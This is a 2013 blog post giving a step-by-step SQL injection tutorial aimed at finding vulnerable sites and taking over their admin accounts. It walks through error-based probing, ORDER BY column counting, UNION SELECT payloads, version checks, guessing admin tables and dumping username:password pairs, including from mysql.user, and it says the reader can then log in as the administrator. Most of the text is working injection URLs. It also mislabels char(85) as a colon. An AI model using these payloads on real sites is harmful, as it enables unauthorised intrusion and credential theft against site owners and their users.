Monday, 16 December 2013

SQL Injection Tutorial [Part 1]





1.Searching the Target and the Admin Password

a)Searching for the target

1- We need to find our target using these dorks. Copy any of the dork and paste it in google. :)


b)Finding the Admin Password

1- Check for vulnerabilities

For example, if we have our target site is like this:

http://www.site.com/index.php?id=5

To check the vulnerability, we need to put ' (quote) at the end of the URL. So our target will looks like this.

http://www.site.com/index.php?=5'

Hit enter and if we get an error such as,

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar, that means the site is vulnerable for SQL Injection :)




2- Finding the number of columns

To find the number of columns, we need to use statement ORDER BY. This statement tells database how to order the result. We need to keep changing the number until we get an error.

http://www.site.com/index.php?id=5 order by 1/* || No Error ||

http://www.site.com/index.php?id=5 order by 2/* || No Error ||

http://www.site.com/index.php?id=5 order by 3/* || No Error ||

http://www.site.com/index.php?id=5 order by 4/* || Error ||


If we get and error like, “ Unknown column '4' in 'order clause' “ or something almost the same, that means the site has 3 column because we got error on column 4.




3- Union Function

With union, we can select more data in one sql statement.


For example we have:

http://www.site.com/index.php?id=5 union all select 1,2,3/*

We need to write 1,2, until 3 because we already found that the number of columns are 3

If your site have 10 columns, you need to write from 1 until 10.

Example :

http://www.site.com/index.php?id=5 union all select 1,2,3,4,5,6,7,8,9,10/*

After we hit enter and we get some numbers on the screen such as 1 or 2 or 3, then the UNION works. :)

If it's not working, try to replace /* with --




4- Check for MySQL version

Let say we have the number 2 on the screen, to check for the MySQL version, we need to replace 2 with @@version or ()version and we will get something like 4.12.33-log or 5.0.45 or something similar.

The statement should look like this,

http://www.site.com/index.php?id=5 union all select 1,@@version,3/*

But if we get an error such as

"union + illegal mix of collations (IMPLICIT + COERCIBLE) …"

We need to put convert() function

Example:

http://www.site.com/index.php?id=5 union all select 1,convert(@@version using latin1),3/*

or you also can use unhex() and hex()

Example:

http://www.site.com/index.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version.






5- Getting table and column name

If the MySQL version is lower than 5 such as 4.1.33 or 4.1.12.

The common table names are :

user/s , admin/s , member/s

The common column names are :

username , user , usr , user_name , password , pass , passwd , pwd and etc


For example :

http://www.site.com/index.php?id=5 union all select 1,2,3 from admin/*

If we can see numbers displayed on the screen like before, that means table admin is exist.




As now, we need to check the column name.

http://www.site.com?index.php?id=5 union all select 1,username,3 from admin/*

If you get an error, you need to try other column name :P

The username that we will get on our screen would be admin or superadmin or etc.




Now we are going to check the password column. :D

http://www.site.com/index.php?id=5 union all select 1,password,3 from admin/*

If you got an error again, you need to try another column name. :P

We will get the password on the screen in hash or plain-text. It depends on how the database is set up.

*If you just can't guess the right table name, you can always try mysql.user (default)

It has the user password columns.

So it would be:

http://www.site.com/index.php?id=5 union all 1,concat(user,0x3a,password),3 from mysql.user/*

Now, to complete the query to make it looks nice, we need to use concat() function. This function joins strings :)

Example:

http://www.site.com/index.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

* I put 0x3a, this is the hex value for colon “ :

We also can replace 0x3a with char(85) .

Char(85) is the ascii value for colon too :)

Example :

http://www.site.com/index.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

So, we will get username:password displayed on the screen.

For example:

admin:admin

or

superadmin:admin

or

admin:passwordinhash



When we have the username and password, we can login into the site as the admin.

Alright, I think that's all my tutorial for SQL Injection :) I will explain about finding the tables and column for MySQL version that is > 5 in another post :D